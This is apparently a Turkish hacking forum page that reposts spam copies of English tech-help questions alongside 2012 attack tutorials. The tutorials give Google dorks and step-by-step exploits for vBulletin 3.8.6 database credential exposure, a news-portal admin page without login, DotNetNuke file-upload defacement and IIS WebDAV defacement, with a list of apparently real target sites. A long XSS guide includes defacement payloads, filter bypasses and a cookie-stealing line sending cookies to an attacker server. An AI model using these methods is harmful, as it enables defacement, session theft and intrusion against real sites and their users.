Hack King

ÜYE GİRİŞİ

Forum: Web Sunucu AciklarI

Web Sunucu AciklarI
Html5 Video and page/website format change December 26, 2017 Hi there, To have a video inserted in the page with the Html 5 video player I guess the page format itself has to be set to Html5 and cannot stay to Html 4.01 Transitional right ? If changing the page format to Html 5 would it make sense to directly change the whole website instead of only one single page ? Knowing that our various websites have been developed under WWB 7, 8, 10, and now 12, always using the Html 4.01 Transitional for all pages is it safe and without concern to move to Html 5 today ? Please help. Thanks! I didn't find the right solution from the Internet. References: https://www.wysiwygwebbuilder.com/forum/viewtopic.php?f=5&t=79166 Sales Promotional Video Animation Html5 Video and page/website format change Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 1500 Son mesaj: Dec 26, 2017 by JoeClark
Creating html buttons as a menu December 26, 2017 I want to use some html responsive buttons as a menu. I'm pretty new to WWB so maybe it's something simple but I'm struggling a bit. I am only interested in the bit buttons, but I would like them to be responsive. I am using a master page, not sure if that could be part of the issue I'm having. Any help would be appreciated. I probably will be asking a fair amount of questions since I'm a newbie, but try to figure it out first, and search the forum before asking. Not always perfect, but trying. Please help. Thanks! I didn't find the right solution from the Internet. References: https://www.wysiwygwebbuilder.com/forum/viewtopic.php?f=5&t=79173 Promo Video Animation Creating html buttons as a menu Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 907 Son mesaj: Dec 26, 2017 by JoeClark
Web Server firewalld question December 26, 2017 Alright, so this is a bit all over the place and I am trying to isolate the issue. Short version. My web server is running, and while in the same network as the server, with a hostfile pointing to it, you can access the site. Trying to hit the site from outside the network causes almost no reaction from the browser, in firefox it just simply hangs. To give a basic idea of the environment I am working in. I am setup in a household with a main router which we opened a DMZ to a secondary router. The secondary router has a rule to drop any packets to any internal ip not inside of its own little environment. This setup let me create a TeamSpeak server on a Linux server os relatively easily. Now when I created my webserver, I don't get a rejected or error message, it just seems to drop. What is bizarre about this is that when using the url to get to the teamspeak server I am hosting in the same little DMZ virtual environment, you can hit the teamspeak server that is running on a Linux server os. So DNS is resolving correctly, pinging the url returns the right ip. What doesn't work is simply browsing to the site. This lead me to wonder if there is a firewalld issue causing it to drop, but why I originally overlooked this option was that while hitting it inside the same environment I could still access the site. So I tried adding the rule Please help. Thanks! I didn't find the right solution from the Internet. References: https://www.centos.org/forums/viewtopic.php?t=47533 Cryptocurrency Advertising Web Server firewalld question Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 997 Son mesaj: Dec 26, 2017 by JoeClark
where are the files stored? December 26, 2017 HI, I'm having problems downloading files uploaded using the Upload file question type. Where are these files stored? How can I download them? Please help. Thanks! I didn't find the right solution from the Internet. References: https://www.limesurvey.org/forum/design-issues/94606-file-upload-question-where-are-the-files-stored SaaS Marketing Examples where are the files stored? Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 935 Son mesaj: Dec 26, 2017 by JoeClark
Nissan GTR R35 ecu Access December 25, 2017 Hello, I am completely new to all of this and looking around for help.I have been told that the Pro tuning shops use a slightly different version on the tuning software which allows them to lock the file somehow....not sure about this...The files I make in my Access Tuner Race software are not lockable. I can share them with anyone and anyone can use the tune files on their GTR. This is good, as it means we can colaborate and improve the tunes through our own testing and tweaking of the tuning files.I've checked Software Explainer Video but I don't see the detailed.Can anyone help me in the endeavour of being able to open up the "locked" map files I have bought so I can see the tuning settings and map tables etc??? .I went through many resources but did not find any solution for this issues. Please help me out. Any help will be appreciated. Thank you -- Edited by aaronpawlak on Tuesday 26th of December 2017 09:38:23 AM Nissan GTR R35 ecu Access Konuyu Başlatan: aaronpawlak Yorumlar: 0 Görünümler: 1017 Son mesaj: Dec 26, 2017 by aaronpawlak
No picture or no signal message December 22, 2017 If connecting a device using component cables, make sure all three color-coded cables are connected correctly. Is the input source powered on? Turn on the set-top box, DVD player, or other component you are trying to view, and, if needed, start play. Is the correct input signal source selected? Select the input source using the remote control: Press the device button on the remote control to control the TV, if applicable, and then press the button to select the input source. This button may be labeled Input or Source. If the button shows a single source, press the button again until you see the desired source; if the button shows a menu, press an Arrow button to highlight the source and then press OK or Select. Check if the OSD menu displays or try changing the input source. Did any image display when you turned on the TV? Please help. Thanks! I didn't find the right solution from the Internet. References: https://support.hp.com/us-en/document/c00547299#AbT0 B2B Marketing Campaign Examples No picture or no signal message Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 911 Son mesaj: Dec 23, 2017 by JoeClark
Check Cooling System December 22, 2017 I know I'm going into obscure territory here, but the Google has not coughed up any interesting cookies for me to munch on. So I thought I would try the community and see if anyone here has suggestions. I have a Samsung 460PXN TV we use as a monitor in our lobby. Lately one of the cooling fans has died, so we replaced all three. They don't use the best bearings in the unit, so it's only a matter of time before they give up the ghost. The problem now is even with new fans in place, the monitor still displays a "check cooling system" message, which floats around the screen. This is sub-optimal! The TV's manual is less than helpful as it just says "If the"Check Cooling System" message is displayed on the screen, this is because the cooling fan has a problem. Contact a service center to repair or replace the fan." Thanks, Samsung. I figure there's one of two issues at play here. 1. There's a flag in the monitor's software that needs to be reset after the fans were replaced. 2. It doesn't like the new fans. The new fans are quieter, which means they run at a lower RPM. It's possible that the OS sees this and thinks the fans are going to fail soon because they're not at top speed. Does anyone have experience with this sort of item that they would care to share? Ideally I would just like to disable the message. If all else fails, I can order up a new set of fans, install those, and see if that makes it happy. Please help. Thanks! I didn't find the right solution from the Internet. References: https://community.spiceworks.com/topic/683038-check-cooling-system Blockchain Marketing Check Cooling System Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 913 Son mesaj: Dec 23, 2017 by JoeClark
UltiDev Web Server Pro December 20, 2017 Hello, we use the UltiDev Web Server Pro 2.0.18 and we get two script error when we start windows. The error come from the UltiDev download page in the UltiDev Server windows. If i go to the download page with internet explorer or firefox all is ok. Can someone help us.? Please help. Thanks! I didn't find the right solution from the Internet. References: http://ultidev.com/forums/yaf_postst5720_Script-error.aspx Creative Promotional examples UltiDev Web Server Pro Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 931 Son mesaj: Dec 20, 2017 by JoeClark
Current server issues? December 20, 2017 Hi, Is Torguard currently having issues with it's servers? For the last three days in the evenings it has been impossible to use Torgurad to connect as nothing will load. This is not my internet connection or computer. Web pages just will not load when connected to Torguard no matter what server I choose or cipher. It is fine again the second I disconnect. It seems to work on and off in the day but not in the evening. This is nothing to do with DNS settings or anything like that on my computer, but seems to be an extremely slow connection to Torguard servers and will just not load web pages properly. Is anyone else experiencing this? It's now become extremely irritating. Please help. Thanks! I didn't find the right solution from the Internet. References: https://torguard.net/forums/index.php?/topic/1140-current-server-issues/ Corporate branding examples Current server issues? Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 865 Son mesaj: Dec 20, 2017 by JoeClark
On slow wine December 16, 2017 HI, There was an article in today's New York Times by a - from what I remember from reading him years ago - particularly crabby and funny Roger Cohen, about the experience of drinking wine in restaurants, and dealing with some servers in that regard. What he describes is news to me, as, all together now, we don't do that in California. Or at least we didn't when I was last there. Please help. Thanks! I didn't find the right solution from the Internet. References: https://able2know.org/topic/115468-1 3D Medical animated video On slow wine Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 877 Son mesaj: Dec 16, 2017 by JoeClark
Adding DNS IP's to /etc/ips.remotedns December 16, 2017 Hi, When I try to add a domain name I keep getting an error message saying that I need to add the nameserver IPs to /etc/ips.remotedns How do I do that????? Please help. Thanks! I didn't find the right solution from the Internet. References: https://able2know.org/topic/7900-1 Medical Business Promotion Adding DNS IP's to /etc/ips.remotedns Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 973 Son mesaj: Dec 16, 2017 by JoeClark
What is the Difference Between Rack & Blade Server? December 16, 2017 I only know that a rack server, also called a rack-mounted server, is a computer dedicated to use as a server and designed to be installed in a framework called a rack. While, a blade server is a stripped-down server computer with a modular design optimized to minimize the use of physical space and energy. As, I find both blade and rack-mounted servers offer distinct advantages in data center computing. I am so excited to know the basic difference between Rack & Blade Server. Any idea..? Please help. Thanks! I didn't find the right solution from the Internet. References: https://able2know.org/topic/199587-1 Business Overview Animation What is the Difference Between Rack & Blade Server? Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 925 Son mesaj: Dec 16, 2017 by JoeClark
Submission - error 500 December 14, 2017 Hello forum, I'm having an issue in the SUBMISSION section... When an author click the NEW SUBMISSION button, he goes to the STEP 1 section... He choose the SECTION and flag all the SUBMISSION CHECKLIST and COPYRIGHT NOTICE... But when he click SAVE AND CONTINUE there is a 500 error and he cannot proceed to STEP 2. The strange thing is that when I (administrator) go to the SITE ADMINISTRATOR section, i can see the new submission active (but incomplete). What could it be? I recently migrate the website and the DB to another server, but the domain name is the same. Please help. Thanks! I didn't find the right solution from the Internet. References: https://forum.pkp.sfu.ca/t/submission-error-500/31535 Insurance Marketing Examples Submission - error 500 Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 897 Son mesaj: Dec 14, 2017 by JoeClark
Web Application Source Code Disclosure Pattern Found December 14, 2017 Hi all, We're using Appscan v9.0.3. The scan found the following medium issue: "Web Application Source Code Disclosure Pattern Found". Can you advise if this is a real problem that needs our attention? If so, can you suggest a way to fix this issue or provide any information that can help us solve this issue? Please help. Thanks! I didn't find the right solution from the Internet. References: https://www.ibm.com/developerworks/community/forums/html/topic?id=5751d52c-bc33-4b2f-8bac-2514463e05d1 Practice Management Marketing Examples Web Application Source Code Disclosure Pattern Found Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 1114 Son mesaj: Dec 14, 2017 by JoeClark
My hotmail account has been hacked! December 13, 2017 Hi, my hotmail and ebay accounts have both been hacked, I have managed to get my ebay account back as they were really helpful, but I am still waiting to find out what is happening with my hotmail account. I have been in touch with hotmail/microsoft, filled in the on line forms as best i can, but I am still waiting for a reply. is there any thing I can do to speed up the process of reclaiming my account? I've had the account for something like 8 or 9 years so you can imagine the number of contacts i have built up! the email address that was hacked is Please help. Thanks! I didn't find the right solution from the Internet. References: https://social.msdn.microsoft.com/Forums/onedrive/en-US/bcf1cc2a-0059-48cf-890c-4db856a5d5fa/my-hotmail-account-has-been-hacked?forum=wlspacesdev Auto Loan Marketing Example My hotmail account has been hacked! Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 922 Son mesaj: Dec 14, 2017 by JoeClark
Did Microsoft change the spamfilter? December 13, 2017 Hi, Since one or two months, I am receiving a lot more emails in my spambox which should not be in there. This includes responses for job applications, bills (and reminders) and even an email send from my parents address it now sees as spam. Especially emails that carry an appendix seem to be targeted. This is problematic since before this problem came to be, I did not have the habit of frequently checking my spam box for emails (since this wasn't an issue). Did Microsoft change anything in the spam filter of the windows live mail? If so, is there a way to change this back or let Microsoft know that this is not an improvement? Please help. Thanks! I didn't find the right solution from the Internet. References: https://social.microsoft.com/Forums/en-US/c36bdf59-c5b9-42ca-9ec9-32ca0df7accf/did-microsoft-change-the-spamfilter?forum=writergeneral Health Insurance Marketing Examples Did Microsoft change the spamfilter? Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 903 Son mesaj: Dec 14, 2017 by JoeClark
Web Server HTTP Header Internal IP Disclosure IIS 8.5 - anyone? December 11, 2017 Just going through a PCI Compliance penetration test (ohh matron...) an have failed on a few things one being "Internet Information Server returns IP address in HTTP header" Now I have found loads of stuff regarding the issues with IIS6 but not nothing much towards 8. I did find this kb though - I will admit I dont really know much about IIS an our exchange environment is working at the moment!! Anyone experienced anything similar? Please help. Thanks! I didn't find the right solution from the Internet. References: https://community.spiceworks.com/topic/2063121-web-server-http-header-internal-ip-disclosure-iis-8-5-anyone Artificial Intelligence Marketing Examples Web Server HTTP Header Internal IP Disclosure IIS 8.5 - anyone? Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 950 Son mesaj: Dec 11, 2017 by JoeClark
SS3 Web Server Questions December 8, 2017 Hi, We recently updated our servers from SS1 to SS3. Hats off to Bentley for the improved login window - very much appreciated. I do have some questions to throw out: 1 - Does SS3 work in browsers other than Internet Explorer? Please help. Thanks! I didn't find the right solution from the Internet. References: https://communities.bentley.com/products/projectwise/content_management/f/content-management-forum/79191/ss3-web-server-questions company introduction video SS3 Web Server Questions Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 898 Son mesaj: Dec 9, 2017 by JoeClark
Smarthub Failed to download(3010) November 11, 2017 Hey all, Really hoping someone help with this.Got my UE40H6400 Smart Tv on Tuesday and have been though the ringer with it ever since. I have factory reset the tv just to get Netflix to work. The issue I can't seem to fix is when trying to download new apps I get the error Failed to download. 3010. I also can select any icon from the smart hub quick launch bar that appears at the bottom of the screen, As I said, I have factory reset it using the tools/info/mute/power options and upgraded the firmware to 2604 via USB key, reset SmartHub several times. I have spoken to Samsung support who told me to reset smart hub and leave it for an hour, then they told me to return the tv. I am now here with the new tv and done the exact same process above with the same issue still there. The self diagnosis fails at app test and says I need to update the tv. I am thinking its my internet connection is blocking a port or something but cant figure it out. Hope someone can help Thanks I didn't find the right solution from the internet. References: http://forum.samygo.tv/viewtopic.php?t=8982 explainer video Smarthub Failed to download(3010) Konuyu Başlatan: JoeClark Yorumlar: 0 Görünümler: 1022 Son mesaj: Nov 11, 2017 by JoeClark
Vbülletin 3.8.6 Açığı January 30, 2012 vBulletin 3.8.6 açığı aslında küçük ve uygulaması çok basit bir açık. Açık sayesinde açığı taşıyan forumun database ismi, database portu, database kullanıcı adı ve kullanıcı şifresi elde edilebiliyor. Şimdi direk söyleyip geçmektense, bazı yeni arkadaşların da anlaması için resimli anlatım yapıcam. Google arama kodumuz: "powered by vBulletin 3.8.6" Şimdi bir siteye girdiğimizi düşünürsek; Buradaki panel bölümünde yardım yazan yere tıklıyoruz. Yabancı forumlarda Faq yazar. Açılan bölümdeki arama yerine Database yazıyoruz ve arama tuşuna basıyoruz. Ta taaa! Direk bilgiler karşımızda. Böyle de açık mı olurmuş hele vBulletinde demeyin oluyor malesef. Açık her zaman sonuç vermez. Türk sitelerinde denemeyin. Eğer Türk sitelerinde açık bulursanız uyarınızı yapın. Vbülletin 3.8.6 Açığı Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 3218 Son mesaj: Jan 30, 2012 by scorpion2763
Xss Açığı Geniş Anlatım January 30, 2012 Bölüm 1 - xss Nedir? “CSS” olarak da bilinen “xss”( Cascading Style Sheets ile karıştırılan Cross Site Scripting) web uygulamalarında sıklıkla karşılaşılan bir açıktır. xss saldırgana kötü niyetli kodlar eklemesine imkan tanımaktadır. xss saldırılarının birçok çeşidi mevcuttur. Şimdi ben burada en çok kullanılan 3 tanesi üzerinde duracağım. Bahsetmek istediğim ilk saldırı turu URL xss’dir. Bu yöntem xss’in sayfada kalmayacağı anlamına gelir. Bu durumda xss, sadece kodu alıp “submit” ettiğimizde çalışacaktır. Bunu kendi lehimize nasıl kullanırız bundan daha çok bahsedeceğiz. İkinci saldırı girdi alanlarındadır. Datayı nereye eklerseniz ekleyin çoğunlukla xss olur. Örnek olarak bir arama motoru kullanarak bir site bulduk. Arama kutucuğuna “hacker” diye yazın ve aratın. Sayfa yüklendiğinde eğer derse ki; “hacker” için 100 sonuç bulundu, veriyi sayfada gösterdiğini göreceksiniz. Şimdi ya kodu çalıştırırsak? Bu saldırıda PHP kodu çalıştırmak mümkün değildir ancak HTML ve JavaScript kodlarını çalıştırmak mümkündür. Bu arada bu yönteme dikkat edin sunucuda kalmayacaktır. Üçüncü saldırı yöntemi; bu yöntem ile kodu ilave edebilirsiniz ve kod sitede kalıcı olacaktır. PHP ve HTML çalıştırıp çalıştıramayacağımıza bağlı olan iki çeşit kodumuz var. Eğer PHP’yi enjekte edersek aynı HTML’yi de enjekte edebiliriz. Bu tarz saldırılar genellikle blog’larda ve profillerde bulunur. Forumlar ise çoğu yerine veri ekleyebildiğiniz ve verilerin eklenilen yerde kaldığı alanlardır. HTML, PHP’den çok farklıdır. HTML bilgisayarınıza “download” edilir ve tarayıcınızda bunu çözümler ( bu nedenle sayfa kaynakları görüntülenebilir). PHP ile de kod, scriptin barındırıldığı sunucu üzerinde çözümlenir, daha sonra veri tarayıcıya geri gönderilir. PHP enjeksiyon için bu durum çok nadirdir. Not: PHP kod asla HTML sayfaya enjekte edilemez. Bölüm 2 - xss Açıklarını Bulma Bu açıkları bulabilmek için Blog’ları, Forum’ları, Shoutbox’ları, yorum kutularını ve arama kutucuklarını deneyerek başlayabilirsiniz. Aslında burada bahsedilenlerden daha fazla örnek vermek mümkündür. Google Dork’ları daha kolay bulmak için kullanılabilir. Örnek olarak google.com girerek inurl:”search.php?q=” yazabilirsiniz. Simdi bu bulunabilen çok genel bir sayfadır ve birçok sonuç elde edebilirsiniz. Daha fazla saldırı bulabilmek için diğer bolüme geçin. Aynı zamanda çoğu sitenin xss açığı bulunduğunu unutmayın ve bunu bulabilmek için sadece iyi bir göz ve birazda filtrelemeye nasıl bypass yapılacağı hakkında bilgi sahibi olmak yeterlidir. Bölüm 3 - xss Üzerine Temel Kavramlar Simdi en çok kullanılan xss olmak üzere en genelinden öğrenmeye başlayalım. En yaygın olanı <****>alert("xss")</**>. Bu kod “xss” tırnak işaretleri olmaksızın, kolaylıkla düzenlenebilir seklinde bir “popup” ikazı verecektir. Bu nedenle, bahsettiğimiz eyleri hatırladığınızı varsayarak bundan bir önceki konuya geri döndüğümüzde, search.php?q= bunu basitçe bir web sitesi üzerinde deneyebiliriz. http://site.com/search.php?q=<**>alert("xss")</**> Büyük bir olasılıkla çalışacaktır ancak yinede çalışmazsa sorun değil, baksa sitelerde de değişik varyasyonlarını deneyebilirsiniz.( ben çoğu kişinin, sadece JavaScript değil HTML kodlar da ekleyebileceklerinin farkında olduklarını sanmıyorum) http://site.com/search.php?q=<br><br><b><u>xss</u></b> Eğer kalın fontla yazılmış metni ve haber baslığını görürseniz açık bulunduğunu biliyorsunuzdur ve artık daha sonra izah edeceğimiz yöntemleri de kullanabilirisiniz. Bölüm 4 - Saldırı Yöntemleri Evet, artık xss nasıl çalışır bunu öğrendik, simdi de bazı xss deface metotlarını izah edebiliriz. Deface için kullanılabilecek birçok yöntem vardır ve ben bunlardan en etkili ve en yaygın olanları üzerinde duracağım. İlki IMG SRC olanıdır. HTML bilmeyenler için IMG SRC, kendisine link’lenmiş olan resmi web sitesinde göstermek için kullanılan bir tag’dır. <html><bOdy><IMG src= "http://site.com/yourDefaceIMAGE.png"> Eğer link’i geçerli bir resim linki ile değiştirir, kaydeder ve çalıştırırsanız ne demek istediğimi daha iyi anlayacaksınız. Şimdi diyelim ki Shoutbox, Commentbox veya siz verilerinizi girdikten ve onayladıktan sonra, girdiğiniz verileri gösteren herhangi bir yer buldunuz. Resmi sayfada gösterebilmek için aşağıda vermiş olduğum link’i ekleyebilirsiniz. <IMG src= "http://site.com/yourDefaceIMAGE.png"> Diğer tag’lara gerek yok çünkü sayfa onları zaten barındırmaktadır (çok ıstınsa durumlarda barındırmayabilirde). Bu resminizin daha büyük görünmesini sağlar ve site net bir şekilde hacklenmiş olur. Diğer bir yöntemde flash videoların kullanımıdır. Aşağıdaki yöntemle aynıdır ancak biraz daha afilli bir yöntemdir. <EMBED src= "http://site.com/xss"> Burada ise, kendisine link’lenmiş olan flash video çalıştırılacaktır. Ya da Pop veya yönlendirme de kullanıyor olabilir <**>window.open( "http://www.google.com/" )</**> Bölüm 5 - Çerez (Cookie) Çalma En etkili yöntem olduğu için bunu eklemek istedim. Önce color=#2e6382http://G0t-Root.net/tools/cookie.php (ben baktım link çalışmıyor) Sitesinden cookie logger’i indirelim. Simdi dosyayı edindik ve a.php seklindeki dosyamızı serverımıza upload ediyoruz. Log.txt dosyasını oluşturmayı var chmod 777 yapmayı unutmayın. Simdi ise herhangi bir saldırıyı gerçekleştirebileceğimiz, xss açığı olan bir site bulun. Simdi ise su kodu ekleyin; window.**** = "http://yourServer.com/cookielogger.php?c="+****.cookie veya ****.**** = "http://yourServer.com/cookielogger.php?c="+****.cookie Bundan sonra kullanıcı eğer siteyi ziyaret ederse cookie loggeri yemiş olacaktır. Gerekli bilgiler siteye gönderilmiş ve cookie’ler çalınmış olacaktır. İkinci kısım ise daha gizli kapaklıdır. Cookie’ler için dosyanıza bakın ve sonra kullanıcının oturumunu yönlendirebilirsiniz. Ancak eğer derseniz ki ya bizim sitemizin bu tarz bir saldırı olanağı yok, sadece datayı bir kez gösteriyor ve onu saklamıyorsa? Diyelim ki bizim search.php?q= diye bir sayfa elimizde, biz bunu aşağıdaki kodu kullanarak ondan zararlı bir url elde edebiliriz ve belki hex belkide base64 onu encode eder ve insanlar kodu goremezler color=#2e6382http://site.com/search.php?q=****.**** = "http://yourServer.com/cookielogger.php?c="+******.cookie Bölüm 6 - Filtreleme İşlemini ByPass Etmek Çoğu sitede acık var gözükebilir ancak kod çalıştırmaz, bunu çözebilmek için bu bolumu iyi not edin. Filtreleme işlemini ByPass etmek için kullanılan bazı genel yöntemler; ’)alert(’xss’); or ");alert(’xss’); Bunlar açık olan bir serverda bu kodun <****>alert("xss")</**> yaptığının aynısını yaparlar. Datayı onaylamadan önce Hexing yada base 64 encoding etmeyi deneyebilirsiniz. Su hususa dikkat edin; xss’i test etmek için (“xss”) ikazı kullanmak hiç de iyi bir pratik yapma yöntemi değildir çünkü ben xss harflerini engelleyen sitelerin olduğunu biliyorum. Filtrelemeyi bypass edebilmek için diğer yollar; <** type=text/javascript>alert("CyberWarrior")</**> <**>alert("CyberWarrior")</**>; <**>alert("CyberWarrior");</**> <**>alert("CyberWarrior"/)</**> <**>var var = 1; alert(var)</**> Bölüm 7 - İleri Seviye xss Bu bolümde sağlam olan belli başlı yöntemleri inceleyeceğiz ki, kendimin bile daha kullanıldığına hiç rastlamadığım yöntemler, eminim beğeneceksiniz. “Sihirli İşaretlerin” kullanıma acık olduğu ve bu nedenle bazı komutları gereksiz kılan birçok site gördüm. Ancak kesirli sayıları kullanarak onları ASCII’ye çeviren bir yönteme rastladım. Kesirli sayıları ASCII’ye çevirmek için gerekli fonksiyonları içeren bütün bir tabloyu color=#2e6382Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion sitesinden edinebilirsiniz. Bu tablo size neyi yazmak istiyorsanız onu yazmanıza yardımcı olacaktır. Ben kendi örneğimde "turkishajan" yazacağım ve aşağıdakilerde bunun için gerekli kodlar; 67 121 98 101 114 87 97 114 114 105 111 114 Evet, şimdi string’imizin ondalık değerlerini elde ettik, bilmemiz gereken şey JavaScript’in bunu hangi fonksiyona dönüştürdüğüdür. String.fromCharCode() Bu kod bu tarz şeyler için uygundur, kurulumu kolaydır. Bunu da aşağıdaki kendi argümanlarımdan vereceğim. String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114 ) Evet simdi "String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114)" “CyberWarrior” ifadesinin JAVA (ASCII)’deki seklidir. Ve bunu uyarı vb şeylerle kullanmak için simgelere ihtiyacınız olmaz çünkü zaten bunun kendisi değişken olarak görev yapar. <**>alert(String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114))</**> Şimdi bu durumda "CyberWarrior" seklinde gösterilecektir. Ve bu yöntem sihirli işaretler denilen imleçleri bypass etmede bir numaradır. Bir sonraki bolüme devam etmeden önce, yine değişkenlerin kullanıldığı başka bir yöntemden daha bahsetmek istiyorum. Söyle bir şey yazalım; var myVar = 1 burada myVar 1 demenin daha uzun bir seklidir. Değişkenleri xss’de kendi lehimize kullanmak için, aşağıdaki şekilde yazabiliriz; <**>var myVar = 1; alert(myVar)</**> Burada değişkenlerin içerikleri herhangi bir işaret (quote) kullanmadan gösterilecektir. Bölüm 8 - xss Güvenliği Bu kısım web yazılımcıları için hazırlanmıştır. Hazırladığınız kodlara nasıl güvenlik sağlayabilirsiniz ondan bahsedeceğim. Eğer **’lerinizde xss açıklarına rastlarsanız, güvenliğini sağlamak çok basittir. Aşağıdaki koda söyle bir göz atın; if(isset($_POST[’form’])){echo "<html><bOdy>" .$_POST[’form’]. "</bOdy></html>";} Diyelim ki $_POST[’from’] değişkeni herhangi bir girdi kutucuğundan geliyordu ve sız de xss saldırısına maruz kaldınız. Sonraki ise bunun güvenliğini sağlamak için çok basit bir yöntem; $charset=’UTF-8’; $data = htmlentities ($_POST[’form’], ENT_NOQUOTES, $charset); if(isset($data)){echo "<html><bOdy>" .$data. "</bOdy></html>";} Bu satır muhtemel tüm kodları alacak ve onları < gibi şeylere dönüştürerek çalışmaz hala getirecektir. HTML girişlerini kullanırken herhangi bir farklılık göze çarpmayacak (); Ayrıca çok yaygın olan başka bir fonksiyon daha var, striptags(), daha fazla bilgiyi php.net/striptags’da bulabilirsiniz. Tam sayı değişkenlerin (yanı içinde her zaman için tamsayı değeri bulunduran değişkenler) güvenliğini nasıl sağlayacağınıza dair size göstereceğim diğer bir yöntem de; $this = $_GET[’id’]; echo "görüntülediğiniz" . $this . "blog"; Xss Açığı Geniş Anlatım Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 3903 Son mesaj:** Jan 30, 2012 by scorpion2763
Haber Portalı Açıgı January 30, 2012 Bu scripti türk siteleri kullanıyor. Yeni buldum. Benden önce bulan yok bilmiyorum Google dork: intitle:/SYnews Haber Portal \| Yönetici Sayfası Çıkan sitelerin sonuna admin/anket.php yazın login pass sormuyor. Yeni anket ekleyin. Anket eklerken HTML taglarını kullanarak ** ata bilirsiniz.. İyi Çalışmalar... Haber Portalı Açıgı Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 2437 Son mesaj:** Jan 30, 2012 by scorpion2763
Dotnuke acıgı January 30, 2012 Merhaba arkadaşlar , bu makalemde size dotnuke açığı ile siteye txt basmayı anlatıcam.Bir dahaki dotnuke açığında ise index basmayı anlatıcam.Evet arkadaşlar ilk olarak google sayfasından : portals/0/ bu kodu aratıyoruz , ve karşımıza tonla sayfa geliyor bu sayfaların hepsinde açık olacak diye bi kayde yok tabikide neyse birine girdik.Sonra girdiğimiz site mesela : www.hackking.activeboard.com bu sitenin sonuna/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx bu kodu ekliyoruz 3.Seçeneğe tıkladık vejavascript:__doPostBack(’ctlUR L$cmdUpload’,’’ ) bu kodu adres bölümüne yapıştırdık enter tuşuna bastık karşımıza upload sayfası gelcek sonra masaüstünde bi txt dosyası açın txt içine ne girmek istiyorsanız girin sonra kayıt edin ve siteye upload edin upload ettiğiniz dosya ; www.hackkin.activeboard.com/portals/0/ornek.txt linkinde gözükecektir.Sonra zone sitelerinden mirror alabilirsiniz Bu anlatımımız buraya kadar yapamayan arkadaşlar yardım için : scorpion_2763@hack.gen.tr adresini ekliyebilir.Bu yazı hack işine yeni başlıyan arkadaşlar için yazılmıştır. Dotnuke acıgı Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 2357 Son mesaj: Jan 30, 2012 by scorpion2763
Iss Açığı ile siteye DaLIN !!! January 30, 2012 Başlat- Çalıştıra Girin sonra aşgıdaki kodu yazın... %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} Sonra bir pencere açılacak.... sağ tıklayıp, Yeni -Wep Klaörü deyin Ve Ordaki bölüme Aşagıdaki Sitelerden birini yazın Eğer açık Kalkmamışsa İndex basabilirsiniz.. http://www.htdraw.com/ http://www.powercool.cn/ http://www.jointtrust.org/ http://termcompass.com/ http://industrialrubbertech.com/- http://www.pkcomp.com/ http://smartcache.net/ http://bandolog.tosembanda.com/ http://www.euroklik.nl/ http://bandolog.tosembanda.com/ http://www.languangav.com/ http://doitrightautoca.com/ http://hongsystem.com/ http://www.aecu.coop/ http://www.htdraw.com/ http://www.powercool.cn/ http://www.solgallery.com/ http://sorwen.com/ http://fairpricesystems.com/ http://gnome-ink.com/ http://hotel-eldorado.net/ http://betterdemocracyforindia.org/ http://creationsinvinyl.com/ http://hariconstruction.net/ http://vinnyandlauren.com/ http://jaguarcasting.com/ http://townandcountrychimney.com/ http://toddandmegan.com/ http://www.jointtrust.org/ http://crypticalizer.com/ http://famfay.com/ http://northwestinventory.com/ http://gbccomlife.com/ http://bochi-rice.com/ http://newtoncandlecompany.com/ http://accuformusa.com/ http://buildingfinancialmodels.net/ http://holysepulchre.net/ http://getonlinescriptsrx.com/ http://gowinconsulting.com/ http://termcompass.com/ http://industrialrubbertech.com/ http://www.501c.com/ http://www.pkcomp.com/ http://heplock.com/ http://cyber-sleuth.net/ http://dave-buchanan.com/ http://fareasternlibrary.org/ http://smartcache.net/ http://comagirlmusic.com/ http://qualitypowerandlighting.com/ http://shorelineblower.com/ http://babzinga.com/ http://go-zoneact.com/ http://mycomputerguyboston.com/ http://j5l.org/ http://morbiran.com/ http://capselkhart.org/ http://standardpack.net/ http://paulstelmaszyk.com http://ak.icp112.cn/ http://thuycailay.thv.vn/ http://thuongdinh.thv.vn/ http://thuantienphat.thv.vn/ http://thuanbuom.thv.vn/ http://thinhdien.thv.vn/ http://thietkelogo.thv.vn/ http://thietbicongtrinh.thv.vn/ http://thienthuantuong.thv.vn/ http://thiengiang.thv.vn/ http://thepvinafco.thv.vn/ http://thepvina.thv.vn/ http://thehe.thv.vn/ http://thayty.thv.vn/ http://thaonhandecal.thv.vn/ http://thanhminh.thv.vn/ http://thanhlongcodra.thv.vn/ http://thanhlong.thv.vn/ http://thanhcongco.thv.vn/ http://thanhbinhhtc.thv.vn/ http://thaitrung.thv.vn/ http://thainguyensteel.thv.vn/ http://thaingoctuan.thv.vn/ http://thaiduongsg.thv.vn/ http://thacprenn.thv.vn/ http://taynguyensteel.thv.vn/ http://tantruongthanh.thv.vn/ 